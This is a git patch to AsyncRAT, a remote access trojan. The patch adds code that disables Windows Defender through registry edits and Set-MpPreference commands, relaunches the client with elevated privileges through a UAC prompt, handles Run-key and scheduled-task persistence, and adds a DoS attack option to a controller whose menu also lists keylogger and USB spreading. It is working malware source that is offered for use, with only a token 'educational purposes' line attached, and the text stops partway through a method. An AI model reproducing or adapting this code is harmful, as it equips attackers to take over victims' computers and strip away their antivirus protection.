From 73acd52efe7f6a1e3a4b0c61fc0326f111077575 Mon Sep 17 00:00:00 2001 From: NYAN CAT Date: Thu, 9 May 2019 06:27:20 -0700 Subject: [PATCH] Update Added dos attack Added disable windows defender Added ask for uac prompt Fix install privileges --- .../AsyncRAT-Sharp/AsyncRAT-Sharp.csproj | 2 + .../AsyncRAT-Sharp/Forms/Form1.Designer.cs | 62 +++++++-- AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs | 88 ++++++++++-- .../Handle Packet/HandleListView.cs | 1 + .../Properties/Resources.Designer.cs | 20 +++ .../AsyncRAT-Sharp/Properties/Resources.resx | 16 ++- .../AsyncRAT-Sharp/Resources/disabled.png | Bin 0 -> 815 bytes AsyncRAT-C#/AsyncRAT-Sharp/Resources/uac.png | Bin 0 -> 1806 bytes AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs | 2 +- AsyncRAT-C#/Client/Client.csproj | 2 + AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs | 36 +++++ .../Client/Handle Packet/HandleUninstall.cs | 18 ++- .../Handle Packet/HandleWindowsDefender.cs | 129 ++++++++++++++++++ AsyncRAT-C#/Client/Handle Packet/Packet.cs | 28 ++-- AsyncRAT-C#/Client/Install/NormalStartup.cs | 21 ++- AsyncRAT-C#/Client/Settings.cs | 2 +- AsyncRAT-C#/Client/Sockets/ClientSocket.cs | 2 + 17 files changed, 387 insertions(+), 42 deletions(-) create mode 100644 AsyncRAT-C#/AsyncRAT-Sharp/Resources/disabled.png create mode 100644 AsyncRAT-C#/AsyncRAT-Sharp/Resources/uac.png create mode 100644 AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs create mode 100644 AsyncRAT-C#/Client/Handle Packet/HandleWindowsDefender.cs diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj b/AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj index fee5432..c5c450b 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj +++ b/AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj @@ -219,6 +219,8 @@ + + diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs index 12e0864..23762ae 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs @@ -38,6 +38,7 @@ this.lv_os = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); this.lv_version = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); this.lv_prefor = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.lv_admin = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); this.contextMenuStrip1 = new System.Windows.Forms.ContextMenuStrip(this.components); this.cLIENTOPTIONSToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.cLOSEToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); @@ -51,15 +52,18 @@ this.sENDFILETOMEMORYToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.rEMOTEDESKTOPToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.kEYLOGGERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); + this.toolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem(); this.fILEMANAGERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.pROCESSMANAGERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); + this.dISABLESToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); + this.wINDOWDSDEFENDERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.bOTKILLERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.uSBSPREADToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); + this.gETADMINISTRATORPRIVILEGESToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.toolStripSeparator2 = new System.Windows.Forms.ToolStripSeparator(); this.bUILDERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.toolStripSeparator3 = new System.Windows.Forms.ToolStripSeparator(); this.aBOUTToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); - this.toolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem(); this.statusStrip1 = new System.Windows.Forms.StatusStrip(); this.toolStripStatusLabel1 = new System.Windows.Forms.ToolStripStatusLabel(); this.ping = new System.Windows.Forms.Timer(this.components); @@ -103,7 +107,8 @@ this.lv_user, this.lv_os, this.lv_version, - this.lv_prefor}); + this.lv_prefor, + this.lv_admin}); this.listView1.ContextMenuStrip = this.contextMenuStrip1; this.listView1.Dock = System.Windows.Forms.DockStyle.Fill; this.listView1.FullRowSelect = true; @@ -154,6 +159,11 @@ this.lv_prefor.Text = "PERFORMANCE"; this.lv_prefor.Width = 170; // + // lv_admin + // + this.lv_admin.Text = "PRIVILEGES"; + this.lv_admin.Width = 138; + // // contextMenuStrip1 // this.contextMenuStrip1.ImageScalingSize = new System.Drawing.Size(24, 24); @@ -169,14 +179,16 @@ this.toolStripMenuItem1, this.fILEMANAGERToolStripMenuItem, this.pROCESSMANAGERToolStripMenuItem, + this.dISABLESToolStripMenuItem, this.bOTKILLERToolStripMenuItem, this.uSBSPREADToolStripMenuItem, + this.gETADMINISTRATORPRIVILEGESToolStripMenuItem, this.toolStripSeparator2, this.bUILDERToolStripMenuItem, this.toolStripSeparator3, this.aBOUTToolStripMenuItem}); this.contextMenuStrip1.Name = "contextMenuStrip1"; - this.contextMenuStrip1.Size = new System.Drawing.Size(283, 442); + this.contextMenuStrip1.Size = new System.Drawing.Size(283, 502); // // cLIENTOPTIONSToolStripMenuItem // @@ -271,6 +283,14 @@ this.kEYLOGGERToolStripMenuItem.Text = "KEYLOGGER"; this.kEYLOGGERToolStripMenuItem.Click += new System.EventHandler(this.KEYLOGGERToolStripMenuItem_Click); // + // toolStripMenuItem1 + // + this.toolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.ddos; + this.toolStripMenuItem1.Name = "toolStripMenuItem1"; + this.toolStripMenuItem1.Size = new System.Drawing.Size(282, 30); + this.toolStripMenuItem1.Text = "DOS ATTACK"; + this.toolStripMenuItem1.Click += new System.EventHandler(this.ToolStripMenuItem1_Click); + // // fILEMANAGERToolStripMenuItem // this.fILEMANAGERToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.filemanager; @@ -287,6 +307,22 @@ this.pROCESSMANAGERToolStripMenuItem.Text = "PROCESS MANAGER"; this.pROCESSMANAGERToolStripMenuItem.Click += new System.EventHandler(this.pROCESSMANAGERToolStripMenuItem_Click); // + // dISABLESToolStripMenuItem + // + this.dISABLESToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.wINDOWDSDEFENDERToolStripMenuItem}); + this.dISABLESToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.disabled; + this.dISABLESToolStripMenuItem.Name = "dISABLESToolStripMenuItem"; + this.dISABLESToolStripMenuItem.Size = new System.Drawing.Size(282, 30); + this.dISABLESToolStripMenuItem.Text = "DISABLES"; + // + // wINDOWDSDEFENDERToolStripMenuItem + // + this.wINDOWDSDEFENDERToolStripMenuItem.Name = "wINDOWDSDEFENDERToolStripMenuItem"; + this.wINDOWDSDEFENDERToolStripMenuItem.Size = new System.Drawing.Size(289, 30); + this.wINDOWDSDEFENDERToolStripMenuItem.Text = "WINDOWDS DEFENDER"; + this.wINDOWDSDEFENDERToolStripMenuItem.Click += new System.EventHandler(this.WINDOWDSDEFENDERToolStripMenuItem_Click); + // // bOTKILLERToolStripMenuItem // this.bOTKILLERToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.botkiller; @@ -303,6 +339,14 @@ this.uSBSPREADToolStripMenuItem.Text = "USB SPREAD"; this.uSBSPREADToolStripMenuItem.Click += new System.EventHandler(this.USBSPREADToolStripMenuItem_Click); // + // gETADMINISTRATORPRIVILEGESToolStripMenuItem + // + this.gETADMINISTRATORPRIVILEGESToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.uac; + this.gETADMINISTRATORPRIVILEGESToolStripMenuItem.Name = "gETADMINISTRATORPRIVILEGESToolStripMenuItem"; + this.gETADMINISTRATORPRIVILEGESToolStripMenuItem.Size = new System.Drawing.Size(282, 30); + this.gETADMINISTRATORPRIVILEGESToolStripMenuItem.Text = "GET ADMIN PRIVILEGES"; + this.gETADMINISTRATORPRIVILEGESToolStripMenuItem.Click += new System.EventHandler(this.GETADMINISTRATORPRIVILEGESToolStripMenuItem_Click); + // // toolStripSeparator2 // this.toolStripSeparator2.Name = "toolStripSeparator2"; @@ -329,14 +373,6 @@ this.aBOUTToolStripMenuItem.Text = "ABOUT"; this.aBOUTToolStripMenuItem.Click += new System.EventHandler(this.ABOUTToolStripMenuItem_Click); // - // toolStripMenuItem1 - // - this.toolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.ddos; - this.toolStripMenuItem1.Name = "toolStripMenuItem1"; - this.toolStripMenuItem1.Size = new System.Drawing.Size(282, 30); - this.toolStripMenuItem1.Text = "DOS ATTACK"; - this.toolStripMenuItem1.Click += new System.EventHandler(this.ToolStripMenuItem1_Click); - // // statusStrip1 // this.statusStrip1.ImageScalingSize = new System.Drawing.Size(24, 24); @@ -598,6 +634,10 @@ private System.Windows.Forms.ContextMenuStrip contextMenuStrip3; private System.Windows.Forms.ToolStripMenuItem notificationOFFToolStripMenuItem; private System.Windows.Forms.ToolStripMenuItem toolStripMenuItem1; + private System.Windows.Forms.ToolStripMenuItem dISABLESToolStripMenuItem; + private System.Windows.Forms.ToolStripMenuItem wINDOWDSDEFENDERToolStripMenuItem; + private System.Windows.Forms.ToolStripMenuItem gETADMINISTRATORPRIVILEGESToolStripMenuItem; + private System.Windows.Forms.ColumnHeader lv_admin; } } diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs index c223b0f..3fa3288 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs @@ -42,7 +42,7 @@ namespace AsyncRAT_Sharp { if (!File.Exists(Path.Combine(Application.StartupPath, Path.GetFileName(Application.ExecutablePath) + ".config"))) { - // File.WriteAllText(Path.Combine(Application.StartupPath, Path.GetFileName(Application.ExecutablePath) + ".config"), Properties.Resources.AsyncRAT_Sharp_exe); + // File.WriteAllText(Path.Combine(Application.StartupPath, Path.GetFileName(Application.ExecutablePath) + ".config"), Properties.Resources.AsyncRAT_Sharp_exe); Process.Start(Application.ExecutablePath); Environment.Exit(0); } @@ -224,20 +224,24 @@ namespace AsyncRAT_Sharp { if (listView1.SelectedItems.Count > 0) { - try + DialogResult dialogResult = MessageBox.Show(this, "Are you sure you want to unistall", "AsyncRAT | Unistall", MessageBoxButtons.YesNo, MessageBoxIcon.Information); + if (dialogResult == DialogResult.Yes) { - MsgPack msgpack = new MsgPack(); - msgpack.ForcePathObject("Packet").AsString = "uninstall"; - foreach (ListViewItem itm in listView1.SelectedItems) + try { - Clients client = (Clients)itm.Tag; - ThreadPool.QueueUserWorkItem(client.BeginSend, msgpack.Encode2Bytes()); + MsgPack msgpack = new MsgPack(); + msgpack.ForcePathObject("Packet").AsString = "uninstall"; + foreach (ListViewItem itm in listView1.SelectedItems) + { + Clients client = (Clients)itm.Tag; + ThreadPool.QueueUserWorkItem(client.BeginSend, msgpack.Encode2Bytes()); + } + } + catch (Exception ex) + { + MessageBox.Show(ex.Message); + return; } - } - catch (Exception ex) - { - MessageBox.Show(ex.Message); - return; } } } @@ -644,10 +648,68 @@ namespace AsyncRAT_Sharp Properties.Settings.Default.Save(); } - private readonly FormDOS formDOS = new FormDOS(); + private readonly FormDOS formDOS = new FormDOS(); private void ToolStripMenuItem1_Click(object sender, EventArgs e) { formDOS.Show(); } + + private void WINDOWDSDEFENDERToolStripMenuItem_Click(object sender, EventArgs e) + { + if (listView1.SelectedItems.Count > 0) + { + DialogResult dialogResult = MessageBox.Show(this, "Administrator privileges are required!", "AsyncRAT | Disbale Defender", MessageBoxButtons.YesNo, MessageBoxIcon.Information); + if (dialogResult == DialogResult.Yes) + { + try + { + MsgPack msgpack = new MsgPack(); + msgpack.ForcePathObject("Packet").AsString = "defender"; + foreach (ListViewItem itm in listView1.SelectedItems) + { + if (itm.SubItems[lv_admin.Index].Text == "Administrator") + { + Clients client = (Clients)itm.Tag; + ThreadPool.QueueUserWorkItem(client.BeginSend, msgpack.Encode2Bytes()); + } + } + } + catch (Exception ex) + { + MessageBox.Show(ex.Message); + return; + } + } + } + } + + private void GETADMINISTRATORPRIVILEGESToolStripMenuItem_Click(object sender, EventArgs e) + { + if (listView1.SelectedItems.Count > 0) + { + DialogResult dialogResult = MessageBox.Show(this, "Popup UAC prompt? ", "AsyncRAT | Disbale Defender", MessageBoxButtons.YesNo, MessageBoxIcon.Information); + if (dialogResult == DialogResult.Yes) + { + try + { + MsgPack msgpack = new MsgPack(); + msgpack.ForcePathObject("Packet").AsString = "uac"; + foreach (ListViewItem itm in listView1.SelectedItems) + { + if (itm.SubItems[lv_admin.Index].Text != "Administrator") + { + Clients client = (Clients)itm.Tag; + ThreadPool.QueueUserWorkItem(client.BeginSend, msgpack.Encode2Bytes()); + } + } + } + catch (Exception ex) + { + MessageBox.Show(ex.Message); + return; + } + } + } + } } } \ No newline at end of file diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleListView.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleListView.cs index 9896812..42ba928 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleListView.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleListView.cs @@ -31,6 +31,7 @@ namespace AsyncRAT_Sharp.Handle_Packet client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("OS").AsString); client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Version").AsString); client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Performance").AsString); + client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Admin").AsString); client.LV.ToolTipText = unpack_msgpack.ForcePathObject("Path").AsString; client.ID = unpack_msgpack.ForcePathObject("HWID").AsString; Program.form1.listView1.Items.Add(client.LV); diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.Designer.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.Designer.cs index bd510c9..256d970 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.Designer.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.Designer.cs @@ -144,6 +144,16 @@ namespace AsyncRAT_Sharp.Properties { } } + /// + /// Looks up a localized resource of type System.Drawing.Bitmap. + /// + internal static System.Drawing.Bitmap disabled { + get { + object obj = ResourceManager.GetObject("disabled", resourceCulture); + return ((System.Drawing.Bitmap)(obj)); + } + } + /// /// Looks up a localized resource of type System.Drawing.Bitmap. /// @@ -264,6 +274,16 @@ namespace AsyncRAT_Sharp.Properties { } } + /// + /// Looks up a localized resource of type System.Drawing.Bitmap. + /// + internal static System.Drawing.Bitmap uac { + get { + object obj = ResourceManager.GetObject("uac", resourceCulture); + return ((System.Drawing.Bitmap)(obj)); + } + } + /// /// Looks up a localized resource of type System.Drawing.Bitmap. /// diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.resx b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.resx index 9392c35..48843c2 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.resx +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.resx @@ -130,9 +130,18 @@ ..\Resources\arrow_up.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a + + ..\Resources\ddos.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a + ..\Resources\play-button.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a + + ..\Resources\disabled.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a + + + ..\Resources\AsyncRAT-Sharp.exe.config;System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089;Windows-1252 + ..\Resources\botkiller.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a @@ -178,10 +187,7 @@ ..\Resources\visit.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a - - ..\Resources\ddos.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a - - - ..\Resources\AsyncRAT-Sharp.exe.config;System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089;Windows-1252 + + ..\Resources\uac.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a \ No newline at end of file diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Resources/disabled.png b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/disabled.png new file mode 100644 index 0000000000000000000000000000000000000000..979db921798090d16d0491a798ca90e809fc75ae GIT binary patch literal 815 zcmeAS@N?(olHy`uVBq!ia0vp^3LwnE0wix1Z>k4UEa{HEjtmSN`?>!lvVtU&J%W50 z7^>757#dm_7=8hT8eT9klo~KFyh>nTu$sZZAYL$MSD+10f+@+{-GzZ+Rj;xUkjGiz z5n0T@z;^_M8K-LVNdpDhOFVsD*&nlVa>_Fu%?$TuU|{^~>EamTaeV4jTYqUsfi`)a z##RPR(XdqqZpKb{V4lFaL?bsqV`77R(n%&wdxj0%Rx1Q}{XB&i)|hmZgm8*93X4p9 zGudLto!O7BrO$tV`1#FK^Jb<$n|pV!tn$gUit|R@XFhWMIIX|VV!7*VnQyafWu|P9 znH92Wvii!4FTE=t_WkB~GBdU-^QCCrEQ5Ywvl-_9`;Cu_rSCXa?Wn0)%PFl`Gb=Ic zica4L!AH|tD@t#_h&d?|`BYFbZ&9pI+u8146BMWKG;{iu7HE9+vr>~@S(Ws4#~*6~ z&UdbOq#SeV;Cb7Y45lY;GRiK@32f{STPL4y-%ubZyDU*w(eKxsp8~oq5zT5&IWBW5 z1#WW`GS~||I@?ffamcA7|3gE?LIG}xwiyT9Z#+=?r_y$X=TR`%AvYUV25VIn=|l$p zj{2VE3YS_%J~UmrFX*+iKC&aBBYt6{K(wUvw4NI-9ko9?1kw$Z9*HR0mGp1wHWgab z)Sh9?dUtaLi?RaW?&k&zY?W(P?G#-7qhtBK7v+MFHdgO%SDJIMQ)H(@$Ll*BA6q-? z+&iN$yKb8h8vNIMbMrdZ<`0&BHzyjkKigb)`1X>9NrFl-Q8~#o)wrkJd?KQsQ#VaS zdz0`!`-8il>-q3p_`2fTjz|-w_sRKNEj#Yd+~{(`UO_QmvAUQh^kMk%6J5u7Rnpfn|t+xs|b@m4T7AfsvJg0i&AF zIus4L`6-!cmAEw&RDTfyYLEok5S*V@Ql40p%1~Zju9umYU7Va)kgAtols@~NjTBH3 NgQu&X%Q~loCIG}QJqZ8+ literal 0 HcmV?d00001 diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Resources/uac.png b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/uac.png new file mode 100644 index 0000000000000000000000000000000000000000..72e9d43f6879cfe84c42d9388e170f334131dac3 GIT binary patch literal 1806 zcmbVNe{2&~9KW)$m7gm!2o_?_+Z2(uch_I*opcE8Y>Rdj=%C~G_3pL3t-U+$Zfl21 z*%->4(_ogU-3SIv6eFlaiH0Z*KQtH=jS_z(5P~eh@W(J}KoH}*u5G~JFD`la-o5vE zpYQMQ^@W;!QzjZGA_y`i;P);=JI-Mh_msP@Z#RD;+^1D0x7F_ivKH z@=eWQc2he`aoB=Jbbf}01Sz00XeN~u6guO^3cNI2Yuh-679eW78(XLeL?giv>Jept zIxJ2zOWGZ117#tdHakU`P%A;YaKeR?HZ$p@?F4PLqQwV;(qt}1FY`WJlm)-sSVC1L z8pqS=v?Xn`h;ke!DT=}gD{i%#A;PS52`ZB@3rbyy!3z{t<|UOE1yo~XqGE^Y#-OHS zCZwb?t)LX$1RaKF7zrmWgl19!$gyRd)FCGe!Z{WPNst19sz5AR#!3lM6_teeH`L|h zn*>1D27_f8x6~z-DvMCmrcP)^(IK})E8#8);LCs_cE~Jf>V#_6Y1T-zM+S^4%3)DV zmI4(jsf>C&T3{&j{*}DIiD_l-4R?T-QGpxN&dr3wOi*FcPLmC^qhTIlqX}XR8WcG` z)^$s$3&!{+D9jp;QJH@Qb1WSb(6T3KkC+r?C>Ux--nbv|ctWxm z+v2&EK{M#%R+C07?HLCB|Ti7*o@X3>L`OK{jSv}L(h!H;sc0|IPuGVEn0{`l_*qT3npE)4rWIdy7*sbcBu{7+)o zIIybzfyt&Q#u&Et9*v^+P1tJZgKf22dn*}YgS{_8yp!-JYlm_X)9&egVaN7EdoP?k zJAClW+H0Sl-+bisW0%j&89hC6eX~B>KRWc)^bKGC*wUCkMl7wo=XgEXrfV_n_#pT@=?xzJ>OWe#^JlVEJ=yUeZT?~3ctwyx}XC`r`~AL;6Lz`t+0jjr}#3jN_b!bI-ikU3DP<>lb{d@I? zNp~!NtoO*eN6fyph8250YaB>DowxT8iS+PWgIgx`P9EvZ4~{$gP4kN Nfu?5fzC{~){sgxbUx@$! literal 0 HcmV?d00001 diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs index 7186c31..c2b65f1 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs @@ -14,6 +14,6 @@ namespace AsyncRAT_Sharp public static string Password { get; set; } public static Aes256 AES{ get; set; } - public static readonly string Version = "AsyncRAT 0.4.6"; + public static readonly string Version = "AsyncRAT 0.4.7"; } } diff --git a/AsyncRAT-C#/Client/Client.csproj b/AsyncRAT-C#/Client/Client.csproj index b48ce74..4fc68ff 100644 --- a/AsyncRAT-C#/Client/Client.csproj +++ b/AsyncRAT-C#/Client/Client.csproj @@ -80,7 +80,9 @@ + + diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs b/AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs new file mode 100644 index 0000000..4204720 --- /dev/null +++ b/AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs @@ -0,0 +1,36 @@ +using Microsoft.Win32; +using System; +using System.Collections.Generic; +using System.Diagnostics; +using System.IO; +using System.Linq; +using System.Security.Principal; +using System.Text; + +namespace Client.Handle_Packet +{ + public class HandleUAC + { + public HandleUAC() + { + if (new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) return; + + try + { + Process proc = new Process + { + StartInfo = new ProcessStartInfo + { + FileName = Process.GetCurrentProcess().MainModule.FileName, + WindowStyle = ProcessWindowStyle.Hidden, + CreateNoWindow = true, + Verb = "runas" + } + }; + proc.Start(); + Environment.Exit(0); + } + catch { } + } + } +} diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs b/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs index 2157f7b..ebfe442 100644 --- a/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs +++ b/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs @@ -5,6 +5,7 @@ using System.Collections.Generic; using System.Diagnostics; using System.IO; using System.Linq; +using System.Security.Principal; using System.Text; namespace Client.Handle_Packet @@ -17,9 +18,22 @@ namespace Client.Handle_Packet { try { - Registry.CurrentUser.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run\").DeleteValue(Path.GetFileName(Settings.ClientFullPath)); + if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) + Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run").DeleteValue(Path.GetFileName(Settings.ClientFullPath)); + else + { + Process.Start(new ProcessStartInfo() + { + FileName = "schtasks", + Arguments = $"/delete /tn {Path.GetFileName(Settings.ClientFullPath)} /f", + CreateNoWindow = true, + ErrorDialog = false, + UseShellExecute = true, + WindowStyle = ProcessWindowStyle.Hidden + }); } - catch { } + } + catch { } } ProcessStartInfo Del = null; try diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleWindowsDefender.cs b/AsyncRAT-C#/Client/Handle Packet/HandleWindowsDefender.cs new file mode 100644 index 0000000..ba23c4b --- /dev/null +++ b/AsyncRAT-C#/Client/Handle Packet/HandleWindowsDefender.cs @@ -0,0 +1,129 @@ +using System; +using Microsoft.Win32; +using System.Diagnostics; +using System.Security.Principal; + +// │ Author : NYAN CAT +// │ Name : Disable Windows Defender v1.0 +// │ Contact : https://github.com/NYAN-x-CAT + +// This program is distributed for educational purposes only. + +namespace Client.Handle_Packet +{ + public class HandleWindowsDefender + { + public HandleWindowsDefender() + { + if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) return; + + RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender", "DisableAntiSpyware", "1"); + RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableBehaviorMonitoring", "1"); + RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableOnAccessProtection", "1"); + RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableScanOnRealtimeEnable", "1"); + RegistryEdit(@"SOFTWARE\Microsoft\Windows Defender\Features", "TamperProtection", "0"); //Windows 10 1903 Redstone 6 + + CheckDefender(); + } + + private static void RegistryEdit(string regPath, string name, string value) + { + try + { + using (RegistryKey key = Registry.LocalMachine.OpenSubKey(regPath, RegistryKeyPermissionCheck.ReadWriteSubTree)) + { + if (key == null) + { + Registry.LocalMachine.CreateSubKey(regPath).SetValue(name, value, RegistryValueKind.DWord); + return; + } + if (key.GetValue(name) != (object)value) + key.SetValue(name, value, RegistryValueKind.DWord); + } + } + catch { } + } + + private static void CheckDefender() + { + Process proc = new Process + { + StartInfo = new ProcessStartInfo + { + FileName = "powershell", + Arguments = "Get-MpPreference -verbose", + UseShellExecute = false, + RedirectStandardOutput = true, + WindowStyle = ProcessWindowStyle.Hidden, + CreateNoWindow = true + } + }; + proc.Start(); + while (!proc.StandardOutput.EndOfStream) + { + string line = proc.StandardOutput.ReadLine(); + + if (line.Contains(@"DisableRealtimeMonitoring") && line.Contains("False")) + RunPS("Set-MpPreference -DisableRealtimeMonitoring $true"); //real-time protection + + else if (line.Contains(@"DisableBehaviorMonitoring") && line.Contains("False")) + RunPS("Set-MpPreference -DisableBehaviorMonitoring $true"); //behavior monitoring + + else if (line.Contains(@"DisableBlockAtFirstSeen") && line.Contains("False")) + RunPS("Set-MpPreference -DisableBlockAtFirstSeen $true"); + + else if (line.Contains(@"DisableIOAVProtection") && line.Contains("False")) + RunPS("Set-MpPreference -DisableIOAVProtection $true"); //scans all downloaded files and attachments + + else if (line.Contains(@"DisablePrivacyMode") && line.Contains("False")) + RunPS("Set-MpPreference -DisablePrivacyMode $true"); //displaying threat history + + else if (line.Contains(@"SignatureDisableUpdateOnStartupWithoutEngine") && line.Contains("False")) + RunPS("Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"); //definition updates on startup + + else if (line.Contains(@"DisableArchiveScanning") && line.Contains("False")) + RunPS("Set-MpPreference -DisableArchiveScanning $true"); //scan archive files, such as .zip and .cab files + + else if (line.Contains(@"DisableIntrusionPreventionSystem") && line.Contains("False")) + RunPS("Set-MpPreference -DisableIntrusionPreventionSystem $true"); // network protection + + else if (line.Contains(@"DisableScriptScanning") && line.Contains("False")) + RunPS("Set-MpPreference -DisableScriptScanning $true"); //scanning of scripts during scans + + else if (line.Contains(@"SubmitSamplesConsent") && !line.Contains("2")) + RunPS("Set-MpPreference -SubmitSamplesConsent 2"); //MAPSReporting + + else if (line.Contains(@"MAPSReporting") && !line.Contains("0")) + RunPS("Set-MpPreference -MAPSReporting 0"); //MAPSReporting + + else if (line.Contains(@"HighThreatDefaultAction") && !line.Contains("6")) + RunPS("Set-MpPreference -HighThreatDefaultAction 6 -Force"); // high level threat // Allow + + else if (line.Contains(@"ModerateThreatDefaultAction") && !line.Contains("6")) + RunPS("Set-MpPreference -ModerateThreatDefaultAction 6"); // moderate level threat + + else if (line.Contains(@"LowThreatDefaultAction") && !line.Contains("6")) + RunPS("Set-MpPreference -LowThreatDefaultAction 6"); // low level threat + + else if (line.Contains(@"SevereThreatDefaultAction") && !line.Contains("6")) + RunPS("Set-MpPreference -SevereThreatDefaultAction 6"); // severe level threat + } + } + + private static void RunPS(string args) + { + Process proc = new Process + { + 